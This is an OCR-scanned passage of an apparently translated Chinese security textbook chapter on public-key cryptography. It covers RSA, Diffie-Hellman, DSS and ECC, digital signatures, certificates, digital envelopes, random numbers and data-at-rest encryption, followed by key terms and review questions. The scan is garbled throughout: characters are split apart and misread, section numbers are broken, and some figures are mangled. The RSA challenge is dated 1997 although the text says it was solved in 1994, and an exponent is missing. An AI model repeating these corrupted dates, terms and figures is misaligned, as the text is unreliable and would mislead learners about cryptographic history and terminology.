根据 不 同 的 应 用 ， 发 送 方 可 使 用 其 私 铀 或 者 接收 方 的 公 钥 或 同时 使 用 两 者 来 实现 密码 功能 。 一 
般 来 讲 ， 可 以 把 公 钥 密码 系统 的 应 用 划分 为 三 类 : 数字 签名 、 对 称 密 钥 分 发 和 密 钥 加 密 。 

这 些 应 用 将 在 2.4 节 进 行 讨论 ， 有 些 算法 可 用 于 上 述 三 种 应 用 ， 而 有 些 算法 则 只 适用 其 中 
一 种 或 两 种 应 用 。 表 2-3 列 出 了 本 节 讨论 的 算法 及 其 所 支持 的 应 用 。 


表 2-3” 公 钥 密 码 体制 的 应 用 


Diffie-Hellman 





2.3.3 ”对 公 钥 密码 的 要 求 


图 2-6 所 示 的 密码 体制 建立 在 基于 两 个 相关 密 钥 的 密码 算法 之 上 。Diffie 和 Hellman 假设 
这 一 密码 系统 是 存在 的 ， 但 没有 证 明 这 种 算法 的 存在 性 。 不 过 他 们 给 出 了 这 些 算法 应 满足 的 条 
件 [DIFF76b]: 

1. B 产生 一 对 密 钥 (AH PU, WH PR) 在 计算 上 是 容易 的 。 

2. 已 知 公 钥 和 要 加 密 的 消息 M， 发 送 方 A 产生 相应 的 密 文 在 计算 上 是 容易 实现 的 : 

C=E(PU,, M) 
3. 接收 方 B 使 用 其 私 钥 对 接收 的 密 文 解密 以 恢复 明文 在 计算 上 是 容易 实现 的 : 
M=D(PR,, C)=D[PR,, E(PU,, M)] 

4. 已 知 公 钥 PU, 时 ， 攻 击 者 要 确定 私 钥 PR 在 计算 上 是 不 可 行 的 。 

5. 已 知 公 钥 PU, 和 密 文 C， 攻 击 者 要 恢复 明文 M 在 计算 上 是 不 可 行 的 。 

还 可 以 增加 一 个 条 件 ， 尽 管 它 很 有 用 ， 但 并 不 是 所 有 的 公 钥 密码 应 用 都 必须 满足 该 条 件 。 

6. 加 密 和 解密 函数 的 顺序 可 以 交换 : 

M=DVPU,, E(PRs, M)|=D[PRs, E(PUs, M)] 


2.3.4” 非 对 称 加 密 算法 


在 本 小 节 中 ， 我们 只 是 简单 地 介绍 一 下 使 用 最 广泛 的 非 对 称 加密 算 法 。 第 21 章 将 给 出 其 
技术 细节 。 
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RSA MIT # Ron Rivest, Adi Shamir 和 Len Adleman 在 1977 年 提出 了 第 一 个 公 钥 体制 
RSA， 并 于 1978 年 首次 发 表 该 算法 [RIVE78]。RSA 被 认为 是 使 用 最 广泛 的 并 被 实现 的 公 钥 加 
密 方法 。RSA 体制 是 一 种 分 组 密码 ， 其 明文 和 密 文 均 是 0 ~ n 一 1 之 间 的 整数 。 

1997 Æ, RSA 的 三 位 发 明 者 发 动 《科学 美国 人 》 杂 志 的 读者 对 他 们 发 表 在 Martin Gardner 
的 “数学 游戏 ”专栏 中 的 密 文 进行 解密 。 解 得 明文 则 可 获得 100 美元 的 奖金 。 他 们 预言 需要 
4X10" 年 才能 解 得 明文 。 但 是 ， 一 个 研究 小 组 利用 连接 到 Internet 上 的 1600 多 台 计 算 机 ， 只 
用 了 8 个 月 时 间 ， 于 1994 年 4 月 解决 了 这 个 问题 [LEUT94]。 这 里 所 用 的 公 钥 的 大 小 (nn 的 长 
BE) 是 129 位 十 进 制 数 ， 即 约 428 位 二 进 制 数 。 这 个 结果 并 没有 让 RSA 的 使 用 变 得 无 效 ， 它 
仅仅 意味 着 应 该 采用 长 度 更 大 的 密 钥 。 实 际 上 ， 对 于 所 有 应 用 来 说 ，1024 位 的 密 钥 长 度 (大 约 
300 位 十 进 制 数 ) 足够 了 。 

Diffie-Hellman 密 钥 协商 “Diffe 和 Hellman 在 一 篇 具有 独创 意义 的 论文 中 首次 提出 了 公 
钥 算 法 ， 给 出 了 公 钥 密码 学 的 定义 [DIFF76]， 该 算法 被 称 为 Diffie-Hellman 密 钥 交换 或 密 钥 协 
议 。 许 多 商业 产品 都 使 用 了 这 种 密 钥 交 换 技术 。 

该 算法 的 目的 是 使 两 个 用 户 能 安全 地 交换 密 钥 ， 以 便 在 后 续 的 通信 中 用 该 密 钥 对 消息 加 
密 。 该 算法 本 身 只 限于 进行 密 钥 交换 。 

数字 签名 标准 “美国 国家 标准 与 技术 研究 所 (NIST) 发 布 的 联邦 信息 处 理 标准 FIPS PUB 
186， 被 称 为 数字 签名 标准 (Digital Signature Standard, DSS). DSS 使 用 SHA-1 算法 给 出 了 一 
种 新 的 数字 签名 方法 ， 即 数字 签名 算法 (DSA). DSA 最 初 提出 于 1991 年 ，1993 年 根据 公众 
对 其 安全 性 的 反馈 意见 对 它 进行 了 一 些 修 改 。1996 年 又 稍 作 修改 。DSS 使 用 的 是 只 提供 数字 
签名 功能 的 算法 。 与 RSA 不 同 ， 它 不 能 用 于 加 密 和 密 钥 分 发 。 

椭圆 曲线 密码 学 ”大 多 数 使 用 公 钥 密码 学 和 数字 签名 的 产品 和 标准 都 使 用 RSA 算法 。 为 
了 保证 RSA 的 使 用 安全 性 ， 最 近 这 些 年 来 密 钥 的 位 数 一 直 在 增加 ， 这 对 使 用 RSA 的 应 用 是 很 
重 的 负担 ， 对 于 进行 大 量 安全 交易 的 电子 商务 更 是 如 此 。 最 近 ， 一 种 具有 强大 竞争 力 的 椭圆 
曲线 密码 学 ( Elliptic Curve Cryptography，ECC) 对 RSA 提出 了 挑战 。 在 标准 化 的 过 程 中 ， 
如 关于 公 钼 密码 学 的 IEEE (电气 和 电子 工程 师 协 会 ) P1363 标准 中 ， 人 们 也 已 考虑 了 ECC. 

与 RSA Hik, ECC 的 主要 诱 人 之 处 在 于 ， 它 可 以 使 用 比 RSA 短 得 多 的 密 钥 得 到 相同 的 安 
全 性 ， 因 此 其 可 以 减轻 处 理 负 荷 。 另 一 方面 ， 虽 然 关 于 ECC 的 理论 已 很 成 熟 ， 但 直到 最 近 才 
出 现 这 方面 的 产品 。 对 于 ECC 的 密码 分 析 也 刚刚 起 步 ， 因 此 ECC 的 可 信 度 还 没有 RSA 高 。 


2.4 数字 签名 和 密 钥 管理 


正如 在 2.3 节 中 介绍 的 ， 公 钥 密 码 算法 在 许多 领域 得 到 了 应 用 。 从 广义 上 讲 ， 这 些 应 用 可 
以 分 为 两 类 ， 数字 签名 、 与 密 钥 管理 和 分 发 相关 的 一 些 技术 。 

针对 密 钥 管理 与 分 发 ， 至 少 有 三 个 不 同方 面 使 用 公 钥 加 密 : 

© 安全 地 分 发 公共 密 钥 ; 

© 使 用 公 钥 加 密 分 发 密 钥 ; 

© 使 用 公 钥 加 密 为 消息 加 密 创建 临时 密 钥 。 

本 节 对 数字 签名 和 各 种 类 型 的 密 钥 管理 和 分 发 进行 简单 的 介绍 。 


2.4.1 数字 签名 


公 钥 加 密 可 以 用 于 认证 ， 如 图 2-6b 所 示 ， 假 设 Bob 要 将 一 条 消息 发 送 给 Alice。 尽 管 消息 
并 不 重要 也 无 须 保密 ， 但 他 想 让 Alice 知道 消息 确实 是 他 发 的 。 出 于 这 个 目的 ，Bob 利用 一 个 
安全 的 散 列 函数 ， 如 SHA-512， 产 生 消 息 的 散 列 值 ， 然 后 将 这 个 散 列 值 用 他 的 私 钥 加 密 ， 从 而 
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就 创建 了 数字 签名 (Digital Signature), Bob 将 附带 着 签名 的 消息 发 送出 去 。 当 Alice MITA 
签名 的 消息 后 她 要 做 的 是 :( 1 ) 计算 该 消息 的 散 列 值 ; ( 2 ) 利用 Bob 的 公 钥 对 签名 进行 解密 ; 
(3 ) 将 计算 出 的 散 列 值 和 解密 出 的 散 列 值 作 比较 。 如 果 这 两 个 散 列 值 相等 ，Alice 就 能 确认 所 
收 到 的 消息 是 由 Bob 签名 过 的 。 因 为 其 他 人 没有 Bob 的 私 钥 ， 所 以 他 们 便 不 能 创建 能 用 Bob 
[60] 的 公 钥 解密 的 密 文 。 另 外 ， 没 有 Bob 的 私 铀 想 对 消息 作 修 改 也 是 不 可 能 的 ， 因 此 ， 消 息 在 来 
源 方 面 和 数据 完整 性 方面 都 得 到 了 认证 。 
特别 需要 强调 的 是 ， 数 字 签 名 并 不 提供 机 密 性 。 也 就 是 说 ， 发 送 消息 不 会 被 算 改 但 可 能 被 
窃听 。 这 一 点 在 对 部 分 消息 进行 签名 的 情况 下 是 明显 的 ， 因 为 其 他 的 消息 均 以 明文 形式 进行 传 
输 。 即 使 在 完全 加 密 的 情况 下 ， 也 不 能 保证 机 密 性 ， 因 为 任何 观察 者 均 可 以 利用 发 送 者 的 公 钥 
对 消息 进行 解密 。 


2.4.2 AEB 


从 字面 上 理解 ， 公 钥 加 密 的 意思 就 是 公 钥 是 公开 的 。 所 以 ， 如 果 有 某 种 广泛 接受 的 公 铀 算 
法 ， 如 RSA， 任 何 参与 者 均 可 以 将 其 公 钥 发 送 给 其 他 参与 者 或 者 把 这 个 公 钥 广播 到 整个 团体 。 
尽管 这 种 方法 使 用 起 来 很 方便 ， 但 是 它 有 一 个 很 大 的 缺陷 ， 即 任何 人 都 可 以 伪造 该 公共 通告 。 
也 就 是 说 ， 某 个 用 户 可 以 假冒 用 户 Bob 向 其 他 参与 者 发 送 公 钥 或 广播 公 钥 ， 直 到 一 段 时 间 后 
FAP Bob 发 觉 伪造 并 告知 其 他 参与 者 ， 伪 造 者 在 此 之 前 可 以 读 取 和 欲 发 送 给 Bob 的 加 密 消息 ， 
并 且 可 以 使 用 伪造 的 密 钥 进行 认证 。 
解决 这 个 问题 的 方法 是 公 钥 证 书 。 实 际 上 ， 公 和 钥 证 书 由 公 钥 加 上 公 钥 所 有 者 的 用 户 
ID 以 及 可 信 第 三 方 签名 的 整个 数据 块 组 成 。 通 常 ， 第 三 方 就 是 用 户 团体 所 信任 的 认证 中 心 
( Certificate Authority，CA)， 如 政府 机 构 或 金融 机 构 。 用 户 可 以 通过 安全 渠道 将 自己 的 公 钥 提 
交 给 该 中 心 并 获得 证 书 。 该 用 户 之 后 可 以 发 布 该 证 书 ， 任 何 需 要 该 用 户 公 钥 的 人 都 可 以 获取 这 
个 证 书 ， 并 通过 附带 的 可 信 签 名 来 验证 其 有 效 性 。 图 2-7 描述 了 这 个 过 程 。 
这 些 关键 的 步骤 总 结 如 下 : 
1. 用 户 软 件 (客户 端 ) 创建 一 对 密 钥 : 一 个 公 钥 和 一 个 私 钥 。 
2. 客户 端 准备 一 个 包含 用 户 ID 和 公 钥 的 未 签名 的 证 书 。 
3. 用 户 通过 某 种 安全 手段 将 未 签名 的 证 书 提交 给 CA。 这 种 手段 可 能 是 面对面 的 会 谈 , 使 
用 已 注册 的 电子 邮件 ， 或 通过 提交 一 个 电子 邮件 认证 的 Web 表单 。 
4. CA 以 如 下 方式 产生 一 个 签名 : 
a. CA 利用 某 个 散 列 函数 计算 出 未 签名 证 书 的 散 列 码 。 该 散 列 函数 ， 例 如 将 在 第 21 章 中 
讨论 的 SHA 函数 族 ， 将 一 个 可 变 长 度 的 数据 分 组 或 消息 映射 到 一 个 固定 长 度 散 列 码 。 

b. CA 用 自己 的 私 钥 对 散 列 码 进行 加 密 ， 以 此 产生 一 个 签名 。 

5. CA 将 签名 附属 在 未 签名 的 证 书后 ， 以 此 创建 一 个 签名 证 书 。 

6. CA 将 签名 证 书 交还 给 客户 端 。 

[61 |] 7. 客户 端 可 以 将 该 签名 证 书 提交 给 其 他 用 户 。 

8. 该 签名 证 书 的 任何 接收 者 可 以 通过 以 下 方法 验证 该 证 书 的 有 效 性 : 
a. 接收 者 计算 证 书 的 散 列 码 (不 包括 CA 的 签名 )。 
b. 接收 者 用 已 知 的 CA 的 公 钥 对 其 签名 进行 解密 。 
c. 接收 者 比较 步 又 (a) 与 (b) 中 的 结果 ， 如 果 它 们 匹配 ， 那 么 该 证 书 是 有 效 的 。 

X.509 标准 已 经 被 广泛 接受 ， 用 来 格式 化 公 钥 证 书 。X.509 证 书 应 用 在 许多 网 络 安全 领域 ， 
包括 卫 安全 (IPSec)、 传 输 层 安 全 (TLS)、 安 全 Shell (SSH) 和 安全 多 用 途 Internet 邮件 扩展 
(S/MIME)。 本 书 的 第 五 部 分 将 讨论 上 述 大 部 分 应 用 。 
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2.4.3 ”利用 公 钥 加 密实 现 对 称 密 钥 交换 


利用 对 称 加 密 ， 两 个 通信 实体 进行 安全 通信 的 一 个 基本 要 求 是 他 们 共享 一 个 秘密 密 钥 。 假 
设 Bob 想 创建 一 个 消息 通信 应 用 ， 使 他 能 与 任何 接 人 Internet 的 用 户 或 接 人 与 他 共享 的 其 他 网 
络 的 用 户 安全 地 交换 电子 邮件 。 假 设 Bob 想 利 用 对 称 加 密 来 实现 。 利 用 对 称 加 密 ，Bob 和 他 
的 通信 者 (比如 ，Alice) 必须 提出 一 个 共享 一 个 唯一 的 私 钥 且 使 其 不 能 被 他 人 获得 的 方法 。 他 
们 如 何 来 完成 这 个 工作 呢 ? 如 果 Alice 就 在 Bob 的 隔壁 ， 那 么 Bob 可 以 生成 一 个 密 钥 ， 把 它 写 
在 纸 上 或 者 存储 在 软盘 上 ， 然 后 把 它 交 给 Alice; 但 是 ， 如 果 Alice 位 于 大 陆 或 世界 的 另 一 侧 ， 
Bob 该 怎么 做 呢 ? 他 可 以 利用 对 称 加 密 来 加 密 该 密 钥 ， 然 后 通过 电子 邮件 将 其 发 送 给 Alice， 
但 这 意味 着 Bob 和 Alice 必须 共享 一 个 秘密 密 钥 来 加 密 这 个 新 的 秘密 密 钥 。 而 且 ，Bob 和 其 他 
所 有 使 用 新 的 邮件 包 的 人 面临 着 一 个 相同 的 问题 : 每 对 通信 者 必须 共享 一 个 唯一 的 秘密 密 钥 。 

一 种 方法 是 使 用 Diffie-Hellman 密 钥 交 换 。 该 方法 事实 上 已 经 被 广泛 使 用 了 。 但 是 它 有 
一 个 缺陷 ， 就 是 它 过 于 简单 的 形式 ，Diffie-Hellman 没有 提供 两 个 通信 者 之 间 的 认证 。 有 许多 
Diffie-Hellman 的 变种 克服 了 这 个 问题 。 而 且 ， 基 于 其 他 公 钥 算法 的 协议 也 能 达到 相同 的 目的 。 


24.4 ”数字 信封 


公 钥 加 密 中 另 一 个 用 来 保护 对 称 密 钥 的 应 用 是 数字 信封 ， 数 字 信封 可 以 用 来 保护 消息 而 不 
必 事 先 让 发 送 方 和 接收 方 具有 相同 的 密 钥 。 这 项 技术 被 称 为 数字 信封 ， 它 相当 于 装着 未 签名 信 
件 的 密封 信封 。 图 2-8 描述 了 这 种 技术 。 假 设 Bob 想 要 发 一 个 机 密 的 消息 给 Alice， 但 是 他 们 
并 没有 共享 一 个 对 称 的 密 钥 ， 那 么 Bob 将 做 以 下 事情 : 

1. 准备 要 发 送 的 消息 。 

2. 产 生 一 个 随机 的 对 称 密 钥 ， 该 密 钥 只 会 用 到 一 次 。 

3. 利用 一 次 性 密 钥 对 消息 进行 对 称 加 密 。 

4. 利用 Alice 的 公 钥 对 一 次 性 密 钥 进行 公 钥 加 密 。 

5. 将 加 密 的 一 次 性 密 钥 和 加 密 的 消息 连 在 一 起 发 送 给 Alice。 

只 有 Alice 可 以 对 一 次 性 密 钥 进行 解密 从 而 还 原 出 原始 的 消息 。 如 果 Bob 通过 Alice 的 公 
钥 证 书 获 得 了 Alice 的 公 和 钥 ， 那 么 Bob 就 能 确信 它 是 一 个 有 效 的 密 钥 。 
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经 过 加 密 
BRE WS 的 对 称 密 铀 
a) 创建 数字 信封 





b) 打开 数字 信封 
图 2-8 ”数字 信封 


2.5 ”随机 数 和 伪 随 机 数 


随机 数 在 许多 网 络 安 全 应 用 中 扮演 着 重要 的 角色 。 本 节 中 ， 我 们 对 它 进行 概括 的 介绍 。 附 
K D 中 给 出 了 详细 的 说 明 。 


2.5.1 随机 数 的 使 用 


基于 密码 学 的 大 量 网 络 安全 算法 使 用 了 随机 数 ， 例 如 : 
© RSA 公 钥 加 密 算 法 (在 第 21 章 中 介绍 ) 和 其 他 公 钥 算法 中 密 钥 的 产生 。 
e 对 称 流 密码 的 流 密 钥 的 生成 。 
e 用 作 临 时 会 话 密 钥 或 者 产生 数字 信封 的 对 称 密 钥 的 生成 。 
© 在 许多 密 钥 分 发 环境 如 Kerberos (在 第 23 章 中 讲述 ) 中 ， 随 机 数 作为 握手 信号 以 防止 
重 放 攻 击 。 
e 会 话 密 钥 的 生成 ， 无 论 其 是 由 密 钥 分 发 中 心 完成 还 是 由 一 个 本 体 (principal) ZR- 
这 些 应 用 对 随机 数 序列 提出 了 两 种 截然 不 同 且 不 一 定 兼 容 的 要 求 : 随机 性 和 不 可 预测 性 。 
随机 性 ”传统 上 ， 对 产生 所 谓 的 随机 数 序列 的 关注 一 直 在 于 数列 的 随机 性 是 否 具 有 良好 的 
统计 性 质 。 下 面 是 两 个 用 来 验证 序列 随机 性 的 准则 : 
© 分 布 均匀 性 ( uniform distribution): 序列 中 随机 数 的 分 布 应 是 均匀 的 ， 即 每 个 数 的 出 现 
频率 应 当 大 致 相等 。 
© 独立 性 (independence): 序列 中 任何 数 不 能 由 其 他 数 推导 出 来 。 
尽管 有 许多 测试 方法 可 以 用 来 确定 一 个 序列 是 否 服 从 某 个 分 布 (如 均匀 分 布 )， 但 还 没有 
某 种 测试 方法 可 以 “证 明 ” 独 立 性 ， 确 切 地 说 ， 某 些 测试 方法 仅 可 以 被 用 于 判断 一 个 序列 不 具 
64| 有 独立 性 。 通 常 的 策略 是 多 进行 一 些 测试 ， 直 至 认为 它 的 独立 性 足够 强 。 
在 我 们 的 讨论 中 ， 在 设计 与 密码 学 相关 的 算法 时 经 常 使 用 看 起 来 统计 随机 的 数列 。 例 如 ， 
RSA 公 钥 加 密 方案 的 一 个 基本 要 求 就 是 产生 素数 的 能 力 。 一 般 来 说 ， 判 断 一 个 给 定 的 大 数 入 
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是 否 为 素数 是 很 难 的 。 采 用 亦 力 测试 的 方法 需要 把 除 以 /以 内 的 数 ， 如 果 六 是 10 这 种 数 
量 级 的 (这 种 大 数 在 公 钥 密码 中 并 非 罕见 )， 那 么 要 蛮 力 测试 它 是 否 为 素数 则 超出 了 人 和 计算 
机 的 实际 计算 能 力 。 然 而 ， 有 许多 有 效 的 算法 可 使 用 随机 选择 的 整数 的 序列 作为 相对 简单 的 计 
算 的 输入 来 测试 一 个 大 数 是 否 为 素数 。 只 要 序列 足够 长 (但 是 远 比 V10 要 少 )， 就 几乎 可 判 
定 这 个 大 数 是 否 为 素数 。 这 类 方法 称 为 不 确定 性 方法 ， 它 在 算法 设计 中 经 常 被 用 到 。 从 本 质 上 
说 ， 若 某 问题 的 精确 求解 很 难 或 很 耗 时 ， 则 可 以 采用 简单 的 、 所 谓 不 确定 的 方法 来 取得 具有 某 
种 可 信 度 的 解 。 

不 可 预测 性 ”在 相互 认证 或 会 话 密 钥 生 成 之 类 的 应 用 中 ， 对 数列 的 统计 随机 性 的 要 求 并 不 
是 很 高 ， 但 是 要 求 产 生 的 随机 数 序列 是 不 可 预测 的 。 所 谓 的 “ 真 ” 随 机 数 序列 ， 是 各 个 数 之 间 
的 统计 独立 性 而 使 序列 不 可 预测 。 不 过 ， 真 正 的 随机 数 序列 很 少 用 到 ， 一 般 的 随机 数 序列 是 由 
算法 产生 的 ， 只 要 敌手 不 能 从 前 面 的 随机 数 推导 出 后 面 的 随机 数 就 可 以 了 。 


2.5.2 ”随机 与 伪 随机 


密码 应 用 大 多 使 用 算法 来 生成 随机 数 。 这 些 算 法 是 确定 的 ， 所 以 产生 的 序列 并 非 是 统计 随 
机 的 。 不 过 要 是 算法 好 的 话 ， 产 生 的 序列 可 以 经 受 住 随机 性 检测 。 这 样 的 数 一 般 被 称 为 伪 随 机 
数 (pseudorandom number)。 

你 也 许 对 这 种 算法 持 怀 疑 态 度 , 但 是 ， 只 要 我 们 不 追求 哲学 上 的 完美 性 ， 这 种 方法 的 确 有 
效 。 也 就 是 说 ， 在 大 多 情况 下 ， 伪 随机 数 在 实际 应 用 中 会 表现 得 像 真 随机 数 一 样 。 尽 管 “ 像 真 
随机 数 一 样 ”这 种 说 法 是 非常 主观 的 ， 然 而 伪 随 机 数 已 被 普遍 接受 。 类 似 思 想 在 统计 应 用 中 也 
有 所 体现 ， 例 如 统计 员 通 过 一 个 人 口 样本 的 分 布 可 以 大 致 估计 出 人 口 的 总 体 分 布 。 

一 个 真 随机 数 发 生 器 ( True Random Number Generator, TRNG) 是 利用 不 确定 的 源 来 生成 
随机 数 。 大 部 分 是 通过 测量 不 可 预测 的 自然 过 程 (如 电离 辐射 效应 的 脉冲 检测 器 、 气 体 放 电 管 
和 漏电 电容 器 ) 来 实现 的 。Intel 公司 开发 了 一 个 商用 芯片 ， 其 通过 增 大 无 驱动 电阻 器 的 电压 
来 对 热 品 声 进 行 采 样 [JUN99]。LavaRnd 是 一 个 利用 廉价 的 照相 机 、 开 源 代码 和 廉价 的 硬件 产 
生 真 随机 数 的 开源 项 目 。 该 系统 采用 不 透 光 的 饱和 电荷 耦合 器 件 (CCD) 作为 混沌 源 来 产生 种 
子 。 软 件 将 结果 处 理 成 多 种 格式 的 真 随机 数 。 第 一 个 作为 商用 的 且 具 有 一 定 产量 的 TRNG 是 
于 2012 年 5 月 上 市 的 Intel 数字 随机 数 发 生 器 (Digital Random Number Generator，DRNG)， 它 
载 于 新 的 多 核 芯片 上 。 


26 ”实际 应 用 : 存储 数据 的 加 密 


计算 机 系统 的 一 条 基本 安全 要 求 是 保护 存储 的 数据 。 对 存储 数据 进行 保护 的 安全 机 制 包括 
访问 控制 、 入 侵 检测 和 入 侵 保 护 策略 ， 这 些 在 本 书 中 均 会 介绍 。 本 书 还 介绍 了 许多 可 以 令 这 些 
安全 机 制 变 得 脆弱 的 技术 手段 。 但 是 除了 技术 方面 的 因素 ,一些 人 为 因素 也 可 以 使 这 些 方法 变 
得 脆弱 。 这 里 根据 文献 [ROTHOS] 列举 出 一 些 例子 。 
e 2004 £ 12 H, 美国 银行 (Bank of America) 的 职员 ， 将 包含 注册 到 一 个 签 账 卡 的 120 
万 政府 工作 人 员 的 名 字 、 地 址 、 银 行 账号 和 社会 保险 号 等 信息 的 数据 备份 到 磁带 ， 并 
送 往 数据 备份 中 心 。 所 有 数据 都 没有 加 密 。 然 而 ， 这 些 磁带 并 没有 被 送 到 ， 事 实 上 它 
们 永远 不 会 被 找到 了 。 遗 憾 的 是 ， 这 种 备份 和 运送 数据 的 方法 太 过 平常 了 。 再 举 一 个 
例子 ，2005 年 4 月 ，Ameritrade 9 指责 其 运 货 商 丢失 了 包含 200 000 名 客户 的 未 加 密 信 
息 的 备份 磁带 。 





O 美国 五 大 在 线 证 券 交易 公司 之 一 。 一 一 译 者 注 
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e 2005 年 4 月 ，SanJose 医疗 机 构 宣称 有 人 通过 物理 途径 偷 走 了 他 们 的 一 台 计 算 机 并 可 能 
获得 185 000 条 未 加 密 的 病人 记录 。 
e 便携 电脑 丢失 的 例子 不 计 其 数 : 在 机 场 丢失 ， 在 停放 着 的 汽车 中 被 盗 ， 在 用 户 离开 办 
公 桌 时 被 拿 走 。 如 果 存 储 在 这 些 笔 记 本 硬盘 上 的 数据 未 加 密 ， 则 所 有 的 数据 都 将 被 窃 
贼 获得 。 
尽管 现在 商业 上 已 经 对 通过 网 络 、Internet 或 无 线 设 备 传输 的 信息 提供 了 包括 加 密 在 内 的 
各 种 保护 手段 ， 可 一 旦 数据 存储 在 本 地 ( 称 为 静态 数据 (data at rest) )， 就 很 少 有 域 认 证 和 操作 
系统 访问 控制 之 外 的 保护 了 。 静 态 数据 通常 备份 在 辅助 存储 器 如 CD-ROM 或 磁带 中 ， 可 以 无 
限期 地 保存 。 而 且 ， 即 使 数据 从 硬盘 中 删除 了 ， 直 到 有 关 的 磁盘 扇 区 被 再 次 使 用 之 前 ， 这 些 数 
据 都 可 以 被 恢复 回来 。 因 此 ， 对 静态 数据 加 密 并 结合 有 效 的 加 密 密 钥 管 理 体制 ， 变 得 颇具 吸引 
力 ， 实际 上 应 该 强制 执行 。 
有 许多 方法 可 以 用 来 进行 加 密 。 一 种 应 用 于 便携 电脑 的 简单 方法 是 利用 一 个 商用 的 加 密 
包 如 良好 隐私 (Pretty Good Privacy, PGP). PGP 可 以 使 用 户 通过 一 个 口令 来 产生 一 个 密 钥 ， 
然后 利用 这 个 密 钥 加 密 从 硬盘 中 选择 的 文件 。PGP 包 并 不 存储 这 个 口令 。 要 恢复 一 个 文件 ， 
需要 先 由 用 户 输入 口令 ，PGP 生成 密 钥 ， 然 后 对 文件 解密 。 只 要 用 户 保护 好 他 的 口令 ， 并 且 
不 使 用 容易 猜测 的 口令 ， 静 态 文件 就 能 受到 完全 的 保护 。[COLL06] 中 列举 了 一 些 最 近 使 用 
的 方法 : 
© 后 端 器 件 (back-end appliance): 这 是 一 个 位 于 服务 器 和 存储 系统 之 间 的 硬件 设备 ， 它 
对 所 有 从 服务 器 传输 到 存储 系统 的 数据 进行 加 密 ， 并 对 在 相反 方向 上 传输 的 数据 进行 
解密 。 这 些 设备 以 接近 线 速 (wire speed) 的 速度 加 密 数 据 ， 并 且 具 有 很 小 的 延迟 。 相 
比 之 下 ， 服 务 器 和 存储 系统 上 的 加 密 软 件 则 减 慢 了 备份 。 系 统管 理 员 可 以 配置 该 器 件 
来 接受 来 自 特 定 用 户 的 请 求 ， 为 他 们 提供 未 加 密 的 数据 。 
e 基于 库 的 磁带 加 密 (library-based tape encryption): 通过 典 人 到 磁带 驱动 器 和 磁带 库 硬 
件 的 协 处 理 器 电路 板 提供 加 密 。 这 个 协 处 理 器 利用 配置 到 电路 板 上 的 不 可 读 的 密 钥 加 
密 数 据 。 然 后 将 磁带 发 送 到 具有 相同 磁带 驱动 器 硬件 的 场所 。 密 钥 可 以 通过 安全 电子 
邮件 或 者 很 小 的 内 存盘 安全 传输 。 如 果 其 他 地 点 的 磁带 驱动 器 硬件 中 的 协 处 理 器 不 可 
用 ， 目 标 机 构 可 以 利用 软件 解密 包 中 的 密 钥 来 恢复 数据 。 
© 便携 电脑 和 PC 后 台数 据 加 密 (backeround laptop and PC data encryption) : 大 量 生产 软 
件 产品 的 厂商 所 提供 的 加 密 功能 对 应 用 和 用 户 是 透明 的 。 一 些 产品 可 以 对 所 有 的 或 指 
定 的 文件 和 文件 夹 进行 加 密 。 另 外 一 些 产 品 则 需 创建 一 个 虚拟 盘 ， 该 虚拟 盘 可 以 通过 
本 地 用 户 的 硬盘 或 网 络 存储 设备 来 维护 ， 虚 拟 盘 中 的 所 有 数据 都 进行 了 加 密 。 不 同 的 
密 钥 管理 方案 可 用 来 限制 对 数据 载体 的 访问 。 


2.7 ”推荐 读物 


[STAL4a] 详细 地 介绍 了 本 章 所 涉及 的 内 容 。 关 于 加 密 算法 的 文献 很 多 ，[SCHN96] 是 一 篇 
非常 有 价值 的 文献 ， 它 描述 了 在 它 出 版 之 前 几乎 所 有 发 表 的 密码 算法 和 协议 。[DIFF79] 是 有 关 
本 章 主题 的 一 篇 很 好 的 经 典 文章 。 

对 密码 编码 学 和 密码 破译 学 的 历史 感 兴趣 的 读者 ， 可 参考 [KAHN96]。 尽 管 这 本 书 更 注重 
于 密码 学 的 影响 而 非 密码 技术 的 发 展 ， 但 是 它 确 实 是 一 部 优秀 的 人 门 读 物 ， 读 来 贷 有 趣味 。 另 
一 本 介绍 密码 学 发 展 历史 的 读物 是 [SING99]。 
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28 关键 术语 、 复 习题 和 习题 
关键 术语 


Advanced Encryption Standard (AES， 高 级 加 密 标准 ) 

asymmetric encryption ( 非 对 称 加 密 ) 

authentication (认证 ) 

brute-force attack (A ALi) 

ciphertext ( 密 文 ) 

collision resistant (Himi ) 

confidentiality (机 密 性 ) 

cryptanalysis (密码 分 析 学 ) 

Data Encryption Standard (DES， 数 据 加 密 标 准 ) 

data integrity (数据 完整 性 ) 

decryption (解密 ) 

Diffie-Hellman key exchange ( Diffie-Hellman 密 4 
交换 ) 

digital signature (数字 签名 ) 

Digital Signature Standard (DSS， 数 字 签 名 标准 ) 

elliptic curve cryptography (椭圆 曲线 密码 学 ) 

encryption (加 密 ) 

hash function 〈 散 列 函 数 ) 

keystream ( 密 钥 流 ) 

message authentication (消息 认证 ) 


复习 题 
2.1 对 称 密码 的 基本 要 素 是 什么 ? 


2.2 ”用 对 称 密码 进行 通信 的 两 个 人 需要 多 少 个 密 钥 ? 


2.3 ”安全 使 用 对 称 加 密 的 两 个 基本 要 求 是 什么 ? 
24 列 出 三 种 消息 认证 的 实现 方法 。 

2.5 什么 是 消息 认证 码 ? 

2.6 简要 描述 图 2-3 中 展示 的 三 种 方案 。 


message authentication code (MAC， 消 息 认 证 码 ) 
modes of operation (运算 模式 ) 

one-way hash function ( 单 向 散 列 函数 ) 
plaintext (明文 ) 

preimage resistant (抗原 象 ) 

private key ( 私 钥 ) 

pseudorandom mumber( 伪 随机 数 ) 

public key ( 公 钥 ) 

public-key certificate ( 公 钥 证 书 ) 

public-key encryption ( 公 钥 加 密 ) 

random mumber( 随 机 数 ) 

RSA (RSA 算法 ) 

second preimage resistant (第 二 抗原 象 ) 
secret key (秘密 密 钥 ) 

secure hash algorithm (SHA， 安 全 散 列 算法 ) 
secure hash function (安全 散 列 函数 ) 

strong collision resistant ( 强 抗 碰 擅 ) 
symmetric encryption (对称 加 密 ) 

triple DES (三 重 DES) 

weak collision resistant 〈 弱 抗 碰 撞 ) 


2.7 ”对 于 消息 认证 有 用 的 散 列 函数 必须 具有 什么 性 质 ? 


28 公 钥 密码 系统 的 主要 要 素 是 什么 ? 


2.9 列 出 并 简要 定义 一 下 公 钥 密码 系统 的 三 种 应 用 。 
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2.10 
2.11 
2.12 
2.13 
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私 钥 和 秘密 密 钥 的 区 别 是 什么 ? 
什么 是 数字 签名 ? 

什么 是 公 钥 证 书 ? 

怎样 利用 公 钥 加 密实 现 秘密 密 钥 的 分 发 ? 


习题 


2.1 


2.2 


2.3 


2.4 


